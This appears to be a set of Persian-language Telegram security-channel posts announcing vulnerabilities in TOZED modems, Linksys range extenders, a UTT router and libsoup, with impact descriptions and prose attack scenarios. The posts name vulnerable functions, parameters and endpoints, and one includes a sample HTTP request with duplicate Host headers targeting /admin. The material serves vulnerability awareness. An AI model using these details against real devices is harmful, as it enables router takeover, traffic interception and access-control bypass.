یک آسیب‌پذیری با شناسه CVE-2025-14126 در مودم‌های TOZED مدل‌های ZLT M30S و ZLT M30S PRO با نسخه‌های فریمور 1.47 و 3.09.06 شناسایی شده است. این ضعف امنیتی به دلیل وجود اعتبارنامه‌های از پیش‌تعیین‌شده (Hard-coded Credentials) در یکی از توابع بخش رابط وب (Web Interface) دستگاه رخ می‌دهد. این بدان معناست که یک نام کاربری و رمز عبور ثابت و غیرقابل تغییر در نرم‌افزار مودم کدنویسی شده است. حمله برای بهره‌برداری از این آسیب‌پذیری باید از داخل شبکه محلی (LAN) انجام شود. اکسپلویت مربوط به این آسیب‌پذیری به صورت عمومی منتشر شده و شرکت سازنده به هشدارهای امنیتی پاسخی نداده است.

⚠️ تأثیر و پیامدها:

مهاجمی که به شبکه محلی (برای مثال، از طریق اتصال به Wi-Fi) دسترسی داشته باشد، می‌تواند با استفاده از این اعتبارنامه‌های افشاشده، به پنل مدیریتی مودم دسترسی کامل و در سطح ادمین پیدا کند. این سطح از دسترسی به مهاجم اجازه می‌دهد تا اقدامات مخرب زیر را انجام دهد:
- تغییر کامل تنظیمات مودم، از جمله رمز عبور Wi-Fi.
- شنود و نظارت بر کل ترافیک اینترنت کاربران متصل به شبکه.
- هدایت کاربران به وب‌سایت‌های جعلی و فیشینگ از طریق تغییر تنظیمات DNS.
- استفاده از مودم به عنوان نقطه‌ای برای اجرای حملات بیشتر علیه سایر دستگاه‌های موجود در شبکه.

🎯 سناریوی حمله:

۱. مهاجم ابتدا به شبکه Wi-Fi محلی متصل می‌شود (مثلاً با حدس زدن رمز عبور یا به عنوان یک کاربر مهمان).
۲. سپس آدرس پنل مدیریتی مودم (معمولاً 192.168.1.1) را در مرورگر خود باز می‌کند.
۳. با استفاده از نام کاربری و رمز عبور ثابتی که به صورت عمومی از طریق اکسپلویت منتشر شده است، به پنل مدیریتی وارد می‌شود.
۴. در این مرحله، مهاجم کنترل کامل بر روی مودم و ترافیک شبکه را در اختیار دارد و می‌تواند به راحتی اهداف مخرب خود را پیاده‌سازی کند.

---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14133

🟠 Risk Level: HIGH (Score: 8.8)

گزارش تحلیل آسیب‌پذیری: CVE-2025-14133
سرریز بافر حیاتی در توسعه‌دهنده‌های شبکه Linksys

---

شرح آسیب‌پذیری:
یک آسیب‌پذیری از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) در تعدادی از مدل‌های توسعه‌دهنده شبکه (Range Extender) شرکت Linksys شناسایی شده است. این ضعف امنیتی در تابع AP_get_wireless_clientlist_setClientsName واقع در فایل mod_form.so وجود دارد.

مهاجم می‌تواند با ارسال یک مقدار دستکاری‌شده در پارامتر clientsname_0، این آسیب‌پذیری را از راه دور و بدون نیاز به احرازهویت فعال کند.

دستگاه‌های تحت تاثیر:
Linksys RE6500
Linksys RE6250
Linksys RE6300
Linksys RE6350
Linksys RE7000
Linksys RE9000
(در نسخه‌های فریم‌ور مشخص شده در جزئیات CVE)

تاثیر:
بهره‌برداری موفق از این آسیب‌پذیری می‌تواند منجر به دو نتیجه خطرناک شود:

۱. اجرای کد از راه دور (RCE): مهاجم می‌تواند کنترل کامل دستگاه را به دست گرفته، به ترافیک شبکه داخلی شنود کند، بدافزار نصب کند یا از دستگاه به عنوان نقطه‌ای برای حمله به سایر سیستم‌های درون شبکه استفاده نماید.

۲. ممانعت از سرویس (DoS): مهاجم می‌تواند با ارسال یک درخواست مخرب، عملکرد دستگاه را مختل کرده و آن را از دسترس خارج کند.

با توجه به اینکه کد بهره‌برداری (Exploit) این آسیب‌پذیری به صورت عمومی منتشر شده و شرکت سازنده نیز پاسخی به گزارش امنیتی نداده است، ریسک بهره‌برداری از آن بسیار بالا ارزیابی می‌شود.

سناریو:
یک مهاجم از راه دور، اینترنت را برای یافتن توسعه‌دهنده‌های Linksys آسیب‌پذیر اسکن می‌کند. پس از شناسایی یک هدف، مهاجم یک درخواست HTTP دستکاری‌شده به پنل وب دستگاه ارسال می‌کند.

این درخواست، حاوی یک رشته بسیار طولانی و مخرب در پارامتر clientsname_0 است که به تابع آسیب‌پذیر ارسال می‌شود. این داده ورودی، از فضای اختصاص‌داده‌شده در پشته فراتر رفته و آدرس بازگشت تابع را بازنویسی می‌کند.

در نتیجه، پس از اتمام کار تابع، به جای بازگشت به روال عادی برنامه، پردازنده به کدی که مهاجم در درخواست خود جاسازی کرده است (Shellcode) پرش می‌کند. این فرآیند به مهاجم اجازه می‌دهد تا با سطح دسترسی سیستم‌عامل دستگاه (احتمالاً root)، دستورات دلخواه خود را اجرا کند و کنترل کامل آن را به دست بگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14134

🟠 Risk Level: HIGH (Score: 8.8)

گزارش تحلیل آسیب‌پذیری: CVE-2025-14134

---

📝 توضیحات آسیب‌پذیری:

یک آسیب‌پذیری از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) با شناسه CVE-2025-14134 در برخی از توسعه‌دهنده‌های شبکه (Range Extender) شرکت Linksys شناسایی شده است.

این ضعف امنیتی در تابع RE2000v2Repeater_get_wireless_clientlist_setClientsName واقع در فایل mod_form.so وجود دارد. مهاجم می‌تواند با دستکاری و ارسال مقادیر مخرب به آرگومان clientsname_0، این آسیب‌پذیری را فعال‌سازی کند.

این حمله از راه دور (Remote) قابل اجرا بوده و اکسپلویت آن به صورت عمومی منتشر شده است. متأسفانه، شرکت سازنده به گزارش اولیه این آسیب‌پذیری هیچ پاسخی نداده است.

دستگاه‌های تحت تأثیر:
• Linksys RE6500, RE6250, RE6300, RE6350, RE7000, RE9000

نسخه‌های آسیب‌پذیر:
• 1.0.013.001, 1.0.04.001, 1.0.04.002, 1.1.05.003, 1.2.07.001

💥 تأثیرات:

بهره‌برداری موفق از این آسیب‌پذیری می‌تواند منجر به اجرای کد دلخواه از راه دور (Remote Code Execution - RCE) بر روی دستگاه هدف شود.

این به معنای آن است که مهاجم می‌تواند کنترل کامل دستگاه را در دست گرفته، تنظیمات آن را تغییر دهد، ترافیک شبکه را شنود کند یا از دستگاه به عنوان نقطه‌ای برای حمله به سایر دستگاه‌های موجود در شبکه داخلی استفاده نماید. همچنین، امکان از کار انداختن دستگاه (Denial of Service - DoS) نیز وجود دارد.

🎭 سناریوی حمله:

یک مهاجم از راه دور، با ارسال یک درخواست HTTP دستکاری‌شده به پنل مدیریتی دستگاه، پارامتر clientsname_0 را با داده‌ای بسیار طولانی‌تر از ظرفیت بافر مربوطه مقداردهی می‌کند.

این عمل باعث سرریز شدن بافر در پشته حافظه (Stack) شده و به مهاجم اجازه می‌دهد تا آدرس بازگشت تابع را بازنویسی کرده و کنترل اجرای برنامه را به کد مخرب تزریق‌شده توسط خود منتقل کند. در نتیجه، مهاجم می‌تواند دستورات دلخواه خود را با سطح دسترسی دستگاه آسیب‌پذیر اجرا نماید.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14135

🟠 Risk Level: HIGH (Score: 8.8)

تحلیل آسیب‌پذیری | CVE-2025-14135

شرح آسیب‌پذیری:
یک آسیب‌پذیری از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) با شناسه CVE-2025-14135 در برخی از دستگاه‌های توسعه‌دهنده محدوده (Range Extender) شرکت Linksys شناسایی شده است.

این ضعف امنیتی در تابع AP_get_wired_clientlist_setClientsName در فایل mod_form.so وجود دارد. مهاجم از راه دور می‌تواند با ارسال یک مقدار دستکاری‌شده و طولانی برای پارامتر clientsname_0، باعث سرریز بافر شده و کنترل اجرای برنامه را به دست گیرد.

دستگاه‌های تحت تاثیر:
• Linksys RE6500, RE6250, RE6300, RE6350, RE7000, RE9000

نسخه‌های فریم‌ور آسیب‌پذیر:
• 1.0.013.001 / 1.0.04.001 / 1.0.04.002 / 1.1.05.003 / 1.2.07.001

تاثیرات:
بهره‌برداری موفق از این آسیب‌پذیری می‌تواند منجر به اجرای کد از راه دور (Remote Code Execution - RCE) با بالاترین سطح دسترسی روی دستگاه شود.

این به این معناست که مهاجم می‌تواند:
• کنترل کامل دستگاه را به دست بگیرد.
• تمام ترافیک شبکه را شنود و دستکاری کند.
• از دستگاه به عنوان نقطه‌ای برای حمله به سایر دستگاه‌های موجود در شبکه داخلی استفاده کند.
• بدافزار یا درهای پشتی (Backdoor) روی دستگاه نصب کند.
• با ایجاد اختلال در عملکرد دستگاه، سرویس‌دهی شبکه را مختل کند (Denial of Service).

با توجه به در دسترس بودن اکسپلویت عمومی و عدم پاسخگویی شرکت سازنده، ریسک این آسیب‌پذیری بسیار بالا ارزیابی می‌شود.

سناریوی حمله:
یک مهاجم که به شبکه محلی دسترسی دارد (یا در صورتی که پنل مدیریت دستگاه روی اینترنت در دسترس باشد، از راه دور)، یک درخواست HTTP دستکاری‌شده به سمت رابط وب دستگاه ارسال می‌کند.

این درخواست شامل یک مقدار بسیار طولانی برای پارامتر clientsname_0 است که مربوط به قابلیت "تغییر نام کلاینت‌های متصل با سیم" می‌باشد.

این مقدار طولانی، فضای اختصاص‌داده‌شده در پشته (Stack) را پر کرده و داده‌های حیاتی مجاور، مانند آدرس بازگشت (Return Address)، را بازنویسی می‌کند.

در نهایت، این بازنویسی باعث می‌شود که کد مخرب مهاجم (Shellcode) که در درخواست جاسازی شده است، با سطح دسترسی سیستم‌عامل دستگاه اجرا شود و کنترل کامل دستگاه در اختیار مهاجم قرار گیرد.

---

توصیه‌های امنیتی:
با توجه به اینکه شرکت Linksys هیچ وصله امنیتی برای این آسیب‌پذیری منتشر نکرده است، اقدامات زیر جهت کاهش ریسک ضروری است:

محدود کردن دسترسی به پنل مدیریت دستگاه فقط از طریق شبکه داخلی و اطمینان از عدم در دسترس بودن آن بر روی اینترنت.
استفاده از کلمه عبور قوی و منحصربه‌فرد برای پنل مدیریت.
در صورت امکان، جایگزینی دستگاه با مدلی که پشتیبانی امنیتی فعال دارد.
نظارت مستمر بر ترافیک شبکه برای شناسایی هرگونه فعالیت مشکوک.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14136

🟠 Risk Level: HIGH (Score: 8.8)

تحلیل آسیب‌پذیری | CVE-2025-14136

🔬 شرح آسیب‌پذیری:

یک آسیب‌پذیری امنیتی حیاتی از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) با شناسه CVE-2025-14136 در طیف وسیعی از تقویت‌کننده‌های (Extenders) شرکت Linksys شناسایی شده است.

این ضعف امنیتی در فایل mod_form.so و به طور مشخص در تابع RE2000v2Repeater_get_wired_clientlist_setClientsName قرار دارد. مهاجم می‌تواند با دستکاری آرگومان clientsname_0 و ارسال یک ورودی با طول بیش از حد مجاز، باعث سرریز بافر شده و کنترل جریان اجرای برنامه را در دست بگیرد.

---

💥 میزان تأثیر:

بهره‌برداری موفق از این آسیب‌پذیری به مهاجم اجازه می‌دهد تا کد دلخواه خود را از راه دور بر روی دستگاه اجرا کند (Remote Code Execution - RCE). این به معنای دستیابی به کنترل کامل دستگاه آسیب‌پذیر است.

با توجه به اینکه کد اکسپلویت این آسیب‌پذیری به صورت عمومی منتشر شده و شرکت سازنده نیز تاکنون هیچ واکنشی نشان نداده و به‌روزرسانی امنیتی ارائه نکرده است، ریسک بهره‌برداری از این ضعف بسیار بالا تلقی می‌شود. پیامدهای اصلی شامل شنود ترافیک شبکه، از کار انداختن سرویس (DoS) و استفاده از دستگاه به عنوان نقطه‌ای برای حمله به سایر تجهیزات شبکه داخلی می‌باشد.

---

🎭 سناریوی حمله:

یک مهاجم از راه دور، با ارسال یک درخواست HTTP دستکاری‌شده به پنل مدیریت وب دستگاه، تابع آسیب‌پذیر را هدف قرار می‌دهد.

در این درخواست، پارامتر clientsname_0 با یک رشته بسیار طولانی که حاوی کدهای مخرب (Shellcode) است، مقداردهی می‌شود.

هنگام پردازش این ورودی نامعتبر، سرریز بافر در پشته رخ می‌دهد و آدرس بازگشت تابع بازنویسی می‌شود. در نتیجه، جریان اجرای برنامه به سمت کدهای مخرب تزریق‌شده توسط مهاجم منحرف شده و نهایتاً دسترسی کامل به سیستم‌عامل دستگاه برای او فراهم می‌گردد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14141

🟠 Risk Level: HIGH (Score: 8.8)

تحلیل آسیب‌پذیری حیاتی در روترهای UTT
شناسه: CVE-2025-14141

---

📝 توضیحات آسیب‌پذیری:
یک آسیب‌پذیری از نوع سرریز بافر (Buffer Overflow) در روترهای UTT 进取 520W نسخه 1.7.7-180627 شناسایی شده است. این ضعف امنیتی ناشی از استفاده ناامن از تابع strcpy در فایل /goform/formArpBindConfig می‌باشد.

یک مهاجم غیرمجاز و از راه دور (Remote) می‌تواند با ارسال یک درخواست دستکاری‌شده و ارسال مقادیر بیش از حد طولانی به پارامتر pools، باعث سرریز شدن بافر حافظه شده و شرایط را برای اجرای کد دلخواه فراهم کند.

💥 تأثیر:
موفقیت در اکسپلویت این آسیب‌پذیری می‌تواند منجر به اجرای کد از راه دور (Remote Code Execution - RCE) با بالاترین سطح دسترسی (root) بر روی دستگاه شود.

این امر به مهاجم اجازه می‌دهد تا کنترل کامل روتر را در دست بگیرد، ترافیک شبکه را شنود یا دستکاری کند، به شبکه داخلی نفوذ کرده و دستگاه را به بخشی از یک بات‌نت تبدیل نماید. همچنین، این حمله می‌تواند به سادگی منجر به از کار افتادن کامل دستگاه (Denial of Service) شود.

🎭 سناریوی حمله:
مهاجم با شناسایی یک روتر UTT آسیب‌پذیر در اینترنت، یک درخواست HTTP مخرب به آدرس /goform/formArpBindConfig ارسال می‌کند. این درخواست حاوی یک رشته بسیار طولانی و مهندسی‌شده در پارامتر pools است که شامل یک شل‌کد (shellcode) نیز می‌باشد.

تابع آسیب‌پذیر strcpy بدون بررسی طول ورودی، تلاش می‌کند این رشته را در یک بافر با اندازه ثابت کپی کند. این عمل باعث سرریز بافر شده و آدرس بازگشت (return address) در پشته (stack) را با آدرس شل‌کد مهاجم بازنویسی می‌کند. در نتیجه، پس از اتمام کار تابع، به جای بازگشت به روال عادی برنامه، شل‌کد مهاجم اجرا شده و یک دسترسی از راه دور برای او ایجاد می‌شود.

نکته مهم: کد اکسپلویت این آسیب‌پذیری به صورت عمومی منتشر شده و شرکت سازنده هیچ واکنشی به گزارش اولیه نشان نداده است، که این موضوع ریسک بهره‌برداری از آن را به شدت افزایش می‌دهد.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
1
🚨 New Vulnerability Alert: CVE-2025-14523

🟠 Risk Level: HIGH (Score: 8.2)


🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14523

🟠 Risk Level: HIGH (Score: 8.2)

تحلیل آسیب‌پذیری حرفه‌ای: CVE-2025-14523

در این گزارش، به بررسی آسیب‌پذیری جدیدی می‌پردازیم که می‌تواند تأثیرات قابل توجهی بر امنیت برنامه‌های وب داشته باشد.

📝 توضیح آسیب‌پذیری:
این آسیب‌پذیری (CVE-2025-14523) مربوط به نقص در نحوه مدیریت هدرهای HTTP توسط کتابخانه libsoup است. این نقص به مهاجم اجازه می‌دهد تا چندین هدر Host: را در یک درخواست HTTP ارسال کند. در حالی که libsoup آخرین رخداد این هدر را برای پردازش سمت سرور برمی‌گرداند، بسیاری از پروکسی‌های جلویی (front proxies) رایج، اولین هدر Host: را مورد توجه قرار می‌دهند. این ناهماهنگی منجر به سردرگمی میزبان مجازی (vhost confusion) می‌شود؛ به این معنی که پروکسی درخواست را به یک سرویس‌دهنده پشتی (backend) خاص هدایت می‌کند، اما سرویس‌دهنده پشتی آن را مربوط به یک میزبان کاملاً متفاوت تفسیر می‌کند.

💥 پیامدها و تأثیرات:
این آسیب‌پذیری می‌تواند منجر به چندین نوع حمله جدی شود:

Request Smuggling: امکان اجرای حملات قاچاق درخواست را فراهم می‌کند که می‌تواند به دسترسی غیرمجاز به منابع داخلی، دور زدن فایروال‌های وب (WAF) و سایر مکانیزم‌های امنیتی منجر شود.

Cache Poisoning: مهاجمان می‌توانند محتوای مخرب را در کش‌های وب سرور یا CDN‌ها تزریق کنند، که سپس به سایر کاربران ارائه می‌شود و به حملات فیشینگ یا انتشار بدافزار کمک می‌کند.

Bypassing Host-Based Access Controls: قابلیت دور زدن کنترل‌های دسترسی مبتنی بر میزبان را به مهاجم می‌دهد. این به معنای دور زدن محدودیت‌های امنیتی است که بر اساس نام میزبان اعمال شده‌اند و دسترسی به منابع محافظت‌شده را ممکن می‌سازد.

🕵️ سناریوی حمله:
فرض کنید یک وب‌سایت دارای یک پروکسی جلویی است که درخواست‌ها را به چندین سرویس‌دهنده پشتی مختلف هدایت می‌کند. مهاجم با ارسال یک درخواست HTTP که شامل دو هدر Host: متفاوت است، این نقص را مورد بهره‌برداری قرار می‌دهد:

GET /admin HTTP/1.1
Host: attacker.com
Host: legitimate-target.com
User-Agent: Mozilla/5.0 (...)
Connection: close
(...)

در این سناریو:
پروکسی جلویی: پروکسی، هدر Host: attacker.com (اولین مورد) را می‌خواند و درخواست را بر اساس آن به یک سرویس‌دهنده پشتی هدایت می‌کند. فرض کنید این پروکسی برای دامنه attacker.com تنظیم نشده و آن را به سرویس‌دهنده پشتی پیش‌فرض ارسال می‌کند که ممکن است مثلاً legitimate-target.com باشد.

سرویس‌دهنده پشتی (Backend) با libsoup: هنگامی که درخواست به سرویس‌دهنده پشتی می‌رسد، کتابخانه libsoup هدر Host: legitimate-target.com (آخرین مورد) را برای پردازش نهایی در نظر می‌گیرد.

این عدم تطابق، سرویس‌دهنده پشتی را فریب می‌دهد تا فکر کند درخواست برای legitimate-target.com است و ممکن است کنترل‌های دسترسی میزبان‌محور مربوط به legitimate-target.com را اعمال کند. با دستکاری URL و هدرهای دیگر، مهاجم می‌تواند به منابعی (مانند صفحات مدیریت /admin) دسترسی پیدا کند که در حالت عادی محافظت‌شده‌اند یا حملاتی نظیر Cache Poisoning را انجام دهد.

برای کاهش این ریسک، توصیه می‌شود که تمامی سیستم‌ها و پروکسی‌های درگیر در پردازش درخواست‌های HTTP، به‌ویژه آن‌هایی که از libsoup استفاده می‌کنند، به آخرین نسخه به‌روزرسانی شوند و پیکربندی‌های امنیتی برای جلوگیری از پذیرش هدرهای Host: تکراری بررسی و اعمال شوند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
1
سلام وقت عزیزان بخیر
چند روزی به علت تغییرات روی ساختار اسیب پذیری ها کانال توضیحات نمیذاشت در رابطه با CVE های جدید که مشکلش رو برطرف کردیم

@RedTeamCVE
@RedTeamAPT1
1👍1